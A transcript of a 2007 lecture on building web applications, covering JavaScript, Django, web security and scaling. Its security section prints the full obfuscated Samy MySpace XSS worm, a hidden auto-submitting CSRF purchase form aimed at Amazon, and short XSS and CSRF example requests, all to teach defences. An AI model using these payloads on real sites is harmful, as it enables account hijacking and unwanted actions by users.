how to build the web

How to build the Web, Simon Willison, 30th November 2007

Upload: simon-willison

Posted on 12-May-2015


DESCRIPTION

A guest lecture I gave for the "Internet Technology" course at my old university (Bath). I tried to pull together all of the things I wish I'd been told before I started building things on the Web.

TRANSCRIPT

Page 1: How to build the Web

How to build the Web

Simon Willison

30th November 2007

Page 2: How to build the Web

This talk

• Modern client-side engineering

• Server-side engineering and web frameworks

• Web application security

• Building sites that scale

Page 3: How to build the Web

What to build

• Product design

• Information architecture

• User experience

• Social software design

• Usability

• Marketing

• ...

How to build it

• Client-side engineering: browsers!

• Server-side engineering: servers!

Page 4: How to build the Web

Client-side engineering

Page 5: How to build the Web

The great myth of client-side development

“It’s way easier than server-side development - after all, it’s just HTML”

Page 6: How to build the Web

That’s hogwash

Page 7: How to build the Web

“Yahoo! Juku is a comprehensive, 3-6 month program to train professional front end developers. The curriculum includes advanced topics in JavaScript, DOM, HTML, CSS, YUI, performance, and accessibility.

Why train raw recruits to this degree? Well, in the San Francisco Bay Area, including the Silicon Valley, it’s hard-as-heck to find good front end programmers and web designers.”

http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html

Page 8: How to build the Web

char*f="char*f=%c%s%c;main(){printf(f,34,f,34,10);}%c";main(){printf(f,34,f,34,10);}

Quines

Page 9: How to build the Web

(*O/*_/Cu #%* )pop mark/CuG 4 def/# 2 def%%%%@@P[TX---P\P_SXPY!Ex(mx2ex("SX!Ex4P)Ex=CuG #%* *+Ex=CuG #%*------------------------------------------------------------------*+Ex=CuG #%* POLYGLOT - a program in eight languages 15 February 1991 *+Ex=CuG #%* 10th Anniversary Edition 1 December 2001 *+Ex=CuG #%* Written by Kevin Bungard, Peter Lisle, and Chris Tham *+Ex=CuG #%*------------------------------------------------------------------*QuZ=CuG #%* *+Ex=CuG #%*!Mx)ExQX5ZZ5SSP5n*5X!)Ex+ExPQXH,B+ExP[-9A-9B(g?(gA'UTTER_XYZZXX!X *+CuG #(* *(C # */); /*(C # *) program polyglot (output); (*+C # identification division.C # program-id. polyglot.C #C # data division.C # procedure division.C #C # * ))cleartomark /Bookman-Demi findfont 36 scalefont setfont (C # * (C #C # * hello polyglots$C # main.C # performC /# * ) 2>_$$; echo "hello polyglots"; rm _$$; exit;C # * (C #C *0 ) unless print "hello polyglots\n"; __END__ printC stop run. -*, 'hello polyglots'CC print.C display "hello polyglots". (C */ int i; /*C */ main () { /*C */ i=printf ("hello polyglots\n"); O= &i; return *O; /*C *) (*C *) begin (*C *) writeln ('hello polyglots'); (*C *) (* )C * ) pop 60 360 (C * ) pop moveto (hello polyglots) show (C * ) pop showpage ((C *) end .(* )C)pop% program polyglot. *){*/}

Polyglots

C, Perl, Pascal, Fortran, COBOL, PostScript, bash/sh/csh, x86 assembler

http://ideology.com.au/polyglot/

Page 10: How to build the Web

Rendering engines

Page 11: How to build the Web

Rendering engines

• Presto: Opera desktop, Opera Mobile, Nintendo Wii, Nintendo DS

• WebKit: Safari, iPhone, Nokia Series 60, Google Android

• Gecko: Firefox, Iceweasel, Camino, Galeon

• Trident (Internet Explorer): sadly still 85% of the market

Page 12: How to build the Web

IE is the problem child

• Microsoft simply stopped updating it once they had won the browser wars... IE 6 came out in 2001!

• Still has shaky support for CSS 2.1

• Many JavaScript APIs developed before standards even existed

• Requires a disproportionate amount of development time

• Status of IE 8 is uncertain

Page 13: How to build the Web

Recommendations

• Develop to the standards using Firefox

• The cases where IE deviates from the standards are relatively well understood, and can usually be worked around

• Avoid CSS hacks; conditional comments are your friend

<!--[if IE]><link rel="stylesheet" type="text/css" href="/static/ieonly.css"><![endif]-->

Page 16: How to build the Web

Accessibility

• Assistive technology thrives on semantic HTML

• <label> elements for forms

• <h1>...<h6> headings for structure

• Avoiding tables for layout

• Watch a video of a screen reader user; they may well browse faster than you do

• Accessibility is much more than just screen readers - colour blindness, motor disorders, learning disabilities, even just poor eyesight

Page 17: How to build the Web

JavaScript

“JavaScript was a rushed little hack for Netscape 2 that was then frozen prematurely during the browser wars, and evolved significantly only once by ECMA. So its early flaws were never fixed, and worse, no virtuous cycle of fine-grained community feedback [...] ever occurred.”

- Brendan Eich

Page 18: How to build the Web

But despite that...

• JavaScript is actually a really neat little language

• Functions are first-class objects

• Lexical closures

• Objects are hash tables

• If you take the time to learn it, it will repay you handsomely

Page 20: How to build the Web

Ajax

Page 21: How to build the Web

February 2005

Page 22: How to build the Web

AJAX vs. Ajax

“Asynchronous JavaScript + XML”

Page 23: How to build the Web

AJAX vs. Ajax

“Asynchronous JavaScript + XML”

“Any technique that allows the client to retrieve more data from the server without reloading the whole page”

Page 24: How to build the Web

Unobtrusive JavaScript

• JavaScript isn't always available

• Security-conscious organisations (and users) sometimes disable it

• Some devices may not support it (mobile phones, for example)

• Assistive technologies (screen readers) may not play well with it

• Search engine crawlers won't execute it

• Unobtrusive: stuff still works without it!

Page 25: How to build the Web

Progressive enhancement

• Start with solid markup

• Use CSS to make it look good

• Use JavaScript to enhance the usability of the page

• The content remains accessible no matter what

Page 26: How to build the Web

Unobtrusive examples

Page 27: How to build the Web

labels.js

• One of the earliest examples of this technique, created by Aaron Boodman (now of Greasemonkey and Google Gears fame)

Page 30: How to build the Web

How it works

• Once the page has loaded, the JavaScript:

• Finds any label elements linked to a text field

• Moves their text into the associated text field

• Removes them from the DOM

• Sets up event handlers to remove the descriptive text when the field is focused

• Clean, simple, reusable

<label for="search">Search</label><input type="text" id="search" name="q">

Page 31: How to build the Web

easytoggle.js

• An unobtrusive technique for revealing panels when links are clicked

<ul> <li><a href="#panel1" class="toggle">Panel 1</a></li> <li><a href="#panel2" class="toggle">Panel 2</a></li> <li><a href="#panel3" class="toggle">Panel 3</a></li></ul>

<div id="panel1">...</div><div id="panel2">...</div><div id="panel3">...</div>

Page 34: How to build the Web

How it works

• When the page has loaded...

• Find all links with class="toggle" that reference an internal anchor

• Collect the elements that are referenced by those anchors

• Hide all but the first

• Set up event handlers to reveal different panels when a link is clicked

• Without JavaScript, links still jump to the right point

Page 35: How to build the Web

Django filter lists

• Large multi-select boxes aren't much fun

• Painful to scroll through

• Easy to lose track of what you have selected

• Django's admin interface uses unobtrusive JavaScript to improve the usability here

Page 38: How to build the Web

• Ajax is often used to avoid page refreshes

• So...

• Write an app that uses full page refreshes

• Use unobtrusive JS to "hijack" links and form buttons and use Ajax instead

• Jeremy Keith coined the term "Hijax" to describe this
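Hijax works best when one URL can serve both the full page and the fragment the Ajax call swaps in. A minimal sketch, assuming the JavaScript library marks its requests with an `X-Requested-With: XMLHttpRequest` header (jQuery and Prototype both add it to their Ajax requests); `search_view` and `render_results` are hypothetical names, not part of any framework.

```python
from html import escape


def render_results(results: list[str]) -> str:
    """Render just the results fragment that the Ajax call swaps into the page."""
    items = "".join(f"<li>{escape(r)}</li>" for r in results)
    return f'<ul id="results">{items}</ul>'


def search_view(headers: dict[str, str], query: str, results: list[str]) -> str:
    """Hypothetical view: one URL serves both full-page and Ajax requests."""
    fragment = render_results(results)
    # Assumes header names have already been normalised to this casing.
    # Ajax libraries send this header; plain link clicks and form posts don't.
    if headers.get("X-Requested-With") == "XMLHttpRequest":
        return fragment
    # Without JavaScript the browser gets a complete page, as before.
    return (
        "<html><body>"
        f"<h1>Results for {escape(query)}</h1>"
        f"{fragment}"
        "</body></html>"
    )


print(search_view({"X-Requested-With": "XMLHttpRequest"}, "django", ["Django docs"]))
print(search_view({}, "django", ["Django docs"]))
```

The full-page version is written first and keeps working on its own; the Ajax branch is just a cheaper response for clients that can use it.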

Page 39: How to build the Web

JavaScript libraries

“The bad news: JavaScript is broken.

The good news: it can be fixed with more JavaScript!”

- Geek folk saying

Page 40: How to build the Web

Main contenders

• Prototype

• The Yahoo! User Interface Library

• The Dojo Toolkit

• jQuery

• It’s worth evaluating these in detail, but if you only have time to learn one...

Page 41: How to build the Web

The short answer: use jQuery

Page 42: How to build the Web

Client-side performance

• Relatively new field, pioneered by the performance team at Yahoo!

• A few simple changes can make a huge difference to perceived loading times

• Example tip: serve your static files (CSS, images, etc.) from a separate domain - that way the cookies for your regular domain won’t be sent with (and slow down) every request for them

Page 44: How to build the Web

Server-side engineering

Page 45: How to build the Web

URL design

(Yes, I should probably be calling them URIs)

Page 47: How to build the Web

Characteristics of good URLs

• “Cool URIs don’t change”

• Guessable

• Hackable

• Readable over the phone

• Reflects the hierarchy of the site and its data

Page 48: How to build the Web

A good URL

• simonwillison.net/2007/Nov/27/thumbnail/

• Short, hackable, no implementation exposed

• Whatever you’re building, including the year is really useful: it lets you change your mind about your URL scheme later on without breaking old links
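Hackable URLs fall out naturally when every prefix of a URL is itself a page. A minimal sketch of a Django-style URL table built with the standard library's `re` module; the patterns follow the example URL above, but the view names are hypothetical.

```python
import re
from typing import Optional

# Hypothetical URL table: each prefix of an entry URL is itself a valid page,
# so users can "hack" the URL by chopping segments off the end.
URL_PATTERNS = [
    (re.compile(r"^/(?P<year>\d{4})/$"), "year_archive"),
    (re.compile(r"^/(?P<year>\d{4})/(?P<month>[A-Z][a-z]{2})/$"), "month_archive"),
    (re.compile(r"^/(?P<year>\d{4})/(?P<month>[A-Z][a-z]{2})/(?P<day>\d{1,2})/$"), "day_archive"),
    (
        re.compile(r"^/(?P<year>\d{4})/(?P<month>[A-Z][a-z]{2})/(?P<day>\d{1,2})/(?P<slug>[\w-]+)/$"),
        "entry",
    ),
]


def resolve(path: str) -> Optional[tuple[str, dict[str, str]]]:
    """Return (view name, captured URL parts) for a path, or None for a 404."""
    for pattern, view in URL_PATTERNS:
        match = pattern.match(path)
        if match:
            return view, match.groupdict()
    return None


for path in ["/2007/Nov/27/thumbnail/", "/2007/Nov/27/", "/2007/Nov/", "/2007/", "/entry.php?id=5"]:
    print(path, "->", resolve(path))
```

Chopping `thumbnail/` off the end gives that day's archive, then the month, then the year, and nothing about the implementation (such as `.php`) leaks into the URL.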

Page 49: How to build the Web

The Open Source stack

• The only option I would consider

• Open source means:

• Zero vendor lock-in; many open-source components are interchangeable

• Better support (fix it yourself, or pay someone smart to fix it for you)

• Fewer bugs and better quality code

Page 50: How to build the Web

Dynamic languages

http://xkcd.com/303/

Page 51: How to build the Web

Dynamic languages

• Social applications in particular are almost impossible to get right first time

• Development only really starts after you’ve launched something and seen what people use it for

• Speed and flexibility of development are critical

• Dynamic languages let you get more done with fewer lines of code (which means fewer bugs)

Page 52: How to build the Web

LAMP

• Linux

• Apache

• MySQL

• PHP/Perl/Python

Page 53: How to build the Web

LAMP, evolved

• Linux / FreeBSD / Solaris

• Apache / Lighttpd / nginx / ...

• MySQL / PostgreSQL

• PHP/Perl/Python / Ruby

Page 54: How to build the Web

Web frameworks

• Ruby: Ruby on Rails

• Python: Django, Pylons, TurboGears

• PHP: Symfony, CakePHP, Zend Framework

• Perl: Catalyst, Maypole

Page 56: How to build the Web

Django

Page 57: How to build the Web

Lawrence, Kansas - 2003

Page 59: How to build the Web

• Two developers

• Two designers

• Around a dozen editorial staff

Page 74: How to build the Web

How do you build a site like lawrence.com?

• Interns - unpaid labour!

• A big relational database

• Newspaper people are baffled by these...

• ... so you need a good interface for it

• And as many development shortcuts as possible

Page 75: How to build the Web

Characteristics

• Clean URLs

• Loosely coupled components

• Designer-friendly templates

• Less code

• The “good bits” from PHP

Page 76: How to build the Web

The Django stack

• HTTP handling

• Models (an ORM)

• Views

• Templates

• Extras

• Admin, RSS framework, generic views...

Page 77: How to build the Web

The Django workflow

• Build the models

• Instant admin! Content people can start adding data

• Write the views

• Throw the templates to the designers

Page 79: How to build the Web

Open source Django

• Django has been open-source since mid-2005

• The newspaper has been able to hire excellent developers from the community

• The newspaper CMS is sold as Ellington; one of the features is that you can hire your own Django developers to modify it

• Django has been hugely improved by contributions from outside the newspaper

Page 83: How to build the Web

Don’t Repeat Yourself

Page 84: How to build the Web

All frameworks provide:

• A recommended way of laying out code

• Separation of application and presentation logic using a template system

• An ORM, to reduce the amount of code needed to talk to a database

• Reusable components for common tasks

Page 85: How to build the Web

Security

Page 86: How to build the Web

Three key attacks

• SQL injection

• XSS (cross-site scripting)

• CSRF (cross-site request forgery)

Page 87: How to build the Web

SQL injection

Page 88: How to build the Web

• SQL injection is inexcusable

• If the environment you are using doesn’t protect against this for you (through parameterised queries), use a different tool
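Python's built-in `sqlite3` module shows the difference. A minimal sketch with a hypothetical `users` table: the first query splices user input into the SQL string, the second passes it as a parameter so the database never treats it as SQL.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", 1), ("bob", 0)])

# Attacker-controlled input, e.g. from a search box.
name = "nobody' OR '1'='1"

# UNSAFE: string formatting lets the input rewrite the query's logic.
unsafe_sql = f"SELECT name FROM users WHERE name = '{name}'"
print(conn.execute(unsafe_sql).fetchall())  # returns every row in the table

# SAFE: the ? placeholder sends the value separately from the SQL text.
safe_rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()
print(safe_rows)  # no rows: nobody has that literal name
```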

Page 89: How to build the Web

Cross-site scripting

• The most common security hole on the web

http://example.com/search?q=<script>alert("hello");</script>

You searched for <?php echo $_GET['q']; ?>

• Massive security hole!
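The fix is to escape user input at the point where it is written into HTML. A minimal Python sketch of the search page above, using the standard library's `html.escape` (PHP's equivalent is `htmlspecialchars`); `search_page` is a hypothetical function.

```python
from html import escape


def search_page(q: str) -> str:
    """Hypothetical search results page that echoes the user's query."""
    # escape() turns &, <, > and (by default) both quote characters into
    # HTML entities, so the browser displays the input instead of running it.
    return f"<p>You searched for {escape(q)}</p>"


print(search_page('<script>alert("hello");</script>'))
```

Escaping on output, rather than trying to strip "bad" input on the way in, means the same stored text stays safe wherever it is displayed.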

Page 90: How to build the Web

XSS attackers can...

• Replace your logo with something obscene

• Steal your users’ authentication cookies

• Re-target login forms to point to a password stealing script

• Perform any action that the user is allowed to perform themselves

• Create self-propagating worms

Page 91: How to build the Web

samy is my hero

http://namb.la/popular/

http://namb.la/popular/tech.html

Page 92: How to build the Web

<div id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new 
ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return 
false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

Page 93: How to build the Web

HTML is dangerous

• It’s best not to allow untrusted users to submit HTML at all

• If you let them submit HTML, you’ll need an industrial grade HTML parser (which emulates browsers, not just the HTML spec) and a very restrictive whitelist

• CSS can include JavaScript, and even regular CSS positioning can be used for phishing

Page 94: How to build the Web

CSRF

• Much less widely understood than XSS...

• ... but almost certainly more common

• Cross-site request forgery attacks allow attackers to force your users to take actions on your site that they didn’t mean to take

• <img src="http://example.com/admin/delete.php?id=5">

• Not just GET; hidden forms allow POST as well

Page 95: How to build the Web

<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe><form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden"><input type="hidden" name="ASIN" value="059600656X" /><input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" /></form><script>document.forms.csrf.submit();</script>

http://shiflett.org/blog/2007/mar/my-amazon-anniversary

Page 97: How to build the Web

Defence against CSRF

• You need to know if the form that is being submitted is one that you served up from your own site (as opposed to an evil form created by an attacker)

• Include a hidden form field with a token generated by your site and associated with the logged-in user in a non-predictable way
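One way to make the token unpredictable yet checkable without extra storage is to derive it from the user's session ID with an HMAC. A minimal sketch using Python's `hmac` and `secrets` modules; `SECRET_KEY`, the session ID format and the function names are assumptions, not any particular framework's API.

```python
import hashlib
import hmac
import secrets

# Server-side secret; in a real deployment this comes from configuration,
# otherwise every restart invalidates outstanding tokens.
SECRET_KEY = secrets.token_bytes(32)


def make_csrf_token(session_id: str) -> str:
    """Token tied to the logged-in user's session, unguessable without SECRET_KEY."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_form(session_id: str) -> str:
    """Every form the site serves carries the token in a hidden field."""
    token = make_csrf_token(session_id)
    return (
        '<form method="post" action="/admin/delete">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        "</form>"
    )


def is_valid_submission(session_id: str, submitted_token: str) -> bool:
    """Reject any POST whose token doesn't match the user's session."""
    expected = make_csrf_token(session_id)
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(expected, submitted_token)


session = "hypothetical-session-id"
print(is_valid_submission(session, make_csrf_token(session)))
print(is_valid_submission(session, "forged"))
```

An attacker's hidden form, like the Amazon one above, can't include the right token: the browser's same-origin policy stops their page from reading the victim's forms to copy it.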

Page 98: How to build the Web

Building sites that scale

Page 99: How to build the Web

Scalability is not performance

Page 100: How to build the Web

Scalability is not performance

Scalable systems increase their performance as new hardware is added, proportional to the hardware’s capacity

Page 101: How to build the Web

Vertical vs. horizontal

• Vertical scaling: buy a bigger machine

• More RAM

• More CPU(s)

• “Big iron” costing $100,000+

• Horizontal scaling: buy more machines

• Almost always better than vertical scaling

• But... software must be designed to scale out

Page 102: How to build the Web

“Premature optimisation is the root of all evil”

- Tony Hoare and Donald Knuth

Page 104: How to build the Web

“Shared nothing”

• Rasmus Lerdorf, the creator of PHP, describes this as a key principle of scaling

• Application servers (web servers running PHP) have no shared state - everything stateful is pushed out to the database layer

• This lets you trivially horizontally scale your application servers behind a load balancer

• Now you just have to scale the data layer...
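The key property is that any application server can handle any request, because none of them keeps state between requests. A minimal sketch, assuming a plain dict stands in for the shared data layer (database or memcached) and a round-robin loop stands in for the load balancer; all names here are hypothetical.

```python
import itertools

# Stand-in for the shared data layer (database, memcached, ...).
shared_store: dict[str, int] = {}


class AppServer:
    """A stateless application server: it keeps nothing between requests."""

    def __init__(self, name: str) -> None:
        self.name = name

    def handle(self, session_id: str) -> str:
        # All per-user state is read from and written back to the shared store.
        visits = shared_store.get(session_id, 0) + 1
        shared_store[session_id] = visits
        return f"{self.name}: visit {visits}"


# Adding capacity is just adding another server to the pool.
servers = [AppServer("app1"), AppServer("app2"), AppServer("app3")]
load_balancer = itertools.cycle(servers)

for _ in range(4):
    print(next(load_balancer).handle("user-42"))
```

The same user lands on a different server each time yet sees a consistent visit count, which is what lets the application tier scale by adding machines.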

Page 105: How to build the Web

Four steps to building a scalable data layer

• Add caching

• De-normalise where necessary

• Add database replication

• Add sharding

Page 106: How to build the Web

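Caching

• You could cache to disk or shared memory...

• ... but you’re better off using memcached

• Distributed key/value in-memory caching system, first developed for LiveJournal

• Facebook, YouTube, Wikipedia, Flickr...

    # memcache: a memcached client object (e.g. python-memcached's Client)
    # construct_obj_from_database: your own (expensive) database query
    def get_obj(obj_id):
        obj = memcache.get(obj_id)
        if obj is None:  # cache miss: rebuild the object from the database
            obj = construct_obj_from_database(obj_id)
            memcache.set(obj_id, obj)
        return obj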
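"Distributed" means the cache is spread across several memcached servers, and each client works out for itself which server holds a given key. A minimal sketch of the simplest scheme, hashing the key modulo the number of servers; the server addresses are hypothetical, and many real clients use consistent hashing instead so that adding a server doesn't remap almost every key.

```python
import zlib
from collections.abc import Sequence

# Hypothetical pool of memcached servers.
SERVERS = ["10.0.0.1:11211", "10.0.0.2:11211", "10.0.0.3:11211"]


def server_for(key: str, servers: Sequence[str] = SERVERS) -> str:
    """Pick the server responsible for a key; every client computes the same answer."""
    # crc32 is stable across processes, unlike Python's built-in hash() for str.
    return servers[zlib.crc32(key.encode()) % len(servers)]


for key in ["user:42", "photo:1337", "user:43"]:
    print(key, "->", server_for(key))
```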

Page 107: How to build the Web

“Normalised data is for sissies”

Cal Henderson, Flickr

• You can get a major speed-up by duplicating some data (e.g. counts) in your database

• Your application logic will need to keep everything in sync
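For example, a hypothetical photo site might store each photo's comment count on the `photos` row rather than running `COUNT(*)` over the comments table on every page view. A minimal `sqlite3` sketch; the schema is an assumption, and the point is that the insert and the counter update run in one transaction so the duplicated value can't drift out of sync.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT,
                         comment_count INTEGER NOT NULL DEFAULT 0);
    CREATE TABLE comments (id INTEGER PRIMARY KEY, photo_id INTEGER, body TEXT);
    INSERT INTO photos (id, title) VALUES (1, 'Sunset');
""")


def add_comment(photo_id: int, body: str) -> None:
    """Insert a comment and bump the duplicated count in one transaction."""
    with conn:  # commits both statements together, or rolls both back
        conn.execute("INSERT INTO comments (photo_id, body) VALUES (?, ?)", (photo_id, body))
        conn.execute(
            "UPDATE photos SET comment_count = comment_count + 1 WHERE id = ?", (photo_id,)
        )


add_comment(1, "Lovely!")
add_comment(1, "Great colours")

# Reading the count is now a single-row lookup instead of a COUNT(*) query.
print(conn.execute("SELECT comment_count FROM photos WHERE id = 1").fetchone()[0])
```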

Page 108: How to build the Web

Replication

• Master-slave replication lets you set up copies of the database to accelerate reads

Master → Slave, Slave, Slave

Reads spread across all slaves

Writes all go to the master
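The application has to decide where each query goes. A minimal sketch of a read/write router, assuming a crude rule that anything starting with `SELECT` is a read; the connection names are hypothetical strings standing in for real database connections. Classic MySQL replication is asynchronous, so a read from a slave immediately after a write may not see that write yet.

```python
import itertools


class ReplicatedDatabase:
    """Hypothetical router: writes go to the master, reads rotate across slaves."""

    def __init__(self, master: str, slaves: list[str]) -> None:
        self.master = master
        self._slaves = itertools.cycle(slaves)

    def connection_for(self, sql: str) -> str:
        # Crude classification for illustration: only SELECTs count as reads.
        if sql.lstrip().upper().startswith("SELECT"):
            return next(self._slaves)
        return self.master


db = ReplicatedDatabase("master", ["slave1", "slave2", "slave3"])
for sql in ["SELECT * FROM photos", "INSERT INTO photos VALUES (1)", "SELECT * FROM users"]:
    print(f"{sql!r} -> {db.connection_for(sql)}")
```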

Page 109: How to build the Web

Replication

• Master-master replication provides redundant masters, but doesn’t really improve write performance (both still have to make the same number of writes)

Master, Master → Slave, Slave, Slave

Reads spread across all slaves

Writes all go to the masters

Page 110: How to build the Web

Sharding

• Sometimes known as federation

• Users 1-1000 are on database A, 1001-2000 are on database B...

• Often requires a large-scale rewrite of the system

• Much harder to do in social applications where relationships span multiple databases

• WordPress MU is an interesting case study
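The application needs a lookup that maps each user to the database holding their data. A minimal sketch of range-based sharding with non-overlapping ranges, using `bisect`; the shard boundaries and database names are hypothetical.

```python
import bisect

# Hypothetical shard map: (highest user ID on the shard, database name).
SHARDS = [(1000, "db_a"), (2000, "db_b"), (3000, "db_c")]
UPPER_BOUNDS = [upper for upper, _ in SHARDS]


def shard_for(user_id: int) -> str:
    """Return the database that stores this user's rows."""
    index = bisect.bisect_left(UPPER_BOUNDS, user_id)
    if user_id < 1 or index == len(SHARDS):
        raise KeyError(f"no shard for user {user_id}")
    return SHARDS[index][1]


def shards_for(user_ids: list[int]) -> set[str]:
    """Every database a multi-user query (e.g. a friends list) has to touch."""
    return {shard_for(uid) for uid in user_ids}


print(shard_for(42))
print(sorted(shards_for([42, 1500, 2999])))
```

Looking up a single user is cheap, but a friends list scattered across shards means querying several databases and merging the results in the application, which is why social applications are so much harder to shard.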

Page 112: How to build the Web

Scalable business models

• Scaling gets a lot easier if you build it into your business model

• 37signals products (Basecamp, Highrise) shard naturally based on individual customer accounts - and more customers means more money for servers

• Second Life shards by land area, and land has to be bought by users - they’re essentially a 3D web hosting company

Page 113: How to build the Web

Build it on Amazon

• S3 - Simple Storage Service

• Cheap, robust key-value storage of both small and large files

• EC2 - Elastic Compute Cloud

• On-demand instant virtual servers, billed by the hour

• SQS - Simple Queue Service

Page 114: How to build the Web

Thank you!
